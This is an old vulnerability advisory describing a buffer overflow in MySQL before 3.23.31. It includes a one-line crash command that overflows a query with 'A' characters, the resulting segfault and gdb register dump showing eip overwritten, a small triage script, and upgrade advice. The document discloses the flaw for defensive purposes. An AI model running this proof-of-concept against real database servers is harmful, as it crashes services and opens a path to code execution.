All MySQL versions earlier than 3.23.31 contain a buffer overflow that crashes mysqld. An attacker can obtain the privileges of the mysqld process and manipulate every database on the server. The attack requires a valid login name and password.
The following is an abstract of the mail originally posted to the MySQL mailing list.
====================================================================
The vulnerability was found by João Gouveia on January 12:
Steps:
Start mysql on the first terminal:
spike:/var/mysql # /sbin/init.d/mysql start
On another terminal, enter:
jrobert@spike:~> mysql -p -e 'select a. ''' perl -e 'printf ("A" x130)' '''. b'
Enter password:
(No response? Exit by ^ C)
On the first terminal, the following information is displayed:
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
nohup
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-locking "$@" >>$err_log 2>&1
Number of processes running now: 0
Mysqld restarted on Fri Jan 12 07:10:54 WET 2001
Mysqld daemon ended
The result is as follows:
(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
The eip value of 0x41414141 (the bytes of the "A" fill pattern) shows that the buffer overflowed and execution was redirected into the attacker-supplied input.
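To make that reading of the dump mechanical, here is a small crash-triage script added as an illustration (it is not part of the original mail): it parses a gdb "info all-registers" listing and reports which registers consist entirely of the input fill byte, so a crash with eip and ebp both equal to 0x41414141 is flagged as a control-flow-affecting overflow rather than a plain bad read. The register text embedded below is a constructed, cleaned-up copy of the dump shown above.

```python
import re

# Constructed sample: a cleaned-up copy of the gdb register dump quoted
# above (assumed 32-bit x86, 4-byte registers). Not output we captured.
GDB_REGISTERS = """\
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
"""

# "<name> <hex value> ..." as printed by gdb's info (all-)registers
REG_LINE = re.compile(r"^\s*(\w+)\s+(0x[0-9a-fA-F]+)\b")


def parse_registers(dump: str) -> dict:
    """Map lower-cased register name -> integer value."""
    regs = {}
    for line in dump.splitlines():
        m = REG_LINE.match(line)
        if m:
            regs[m.group(1).lower()] = int(m.group(2), 16)
    return regs


def filled_with(value: int, fill: int, width: int = 4) -> bool:
    """True if every byte of a width-byte register equals the fill byte."""
    return value.to_bytes(width, "little") == bytes([fill]) * width


def triage(dump: str, fill_byte: int = 0x41) -> dict:
    """Report which registers hold only the fill byte of the crashing input.

    eip made entirely of the fill pattern means control flow was diverted
    into attacker-controlled data: a stack buffer overflow, not a bad read.
    """
    regs = parse_registers(dump)
    tainted = sorted(r for r, v in regs.items() if filled_with(v, fill_byte))
    return {
        "tainted": tainted,
        "eip_controlled": "eip" in tainted,
        "frame_pointer_controlled": "ebp" in tainted,
    }


if __name__ == "__main__":
    print(triage(GDB_REGISTERS))
```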
The fix is to upgrade to 3.23.31. If you have not yet upgraded your database to the latest version, do so as soon as possible.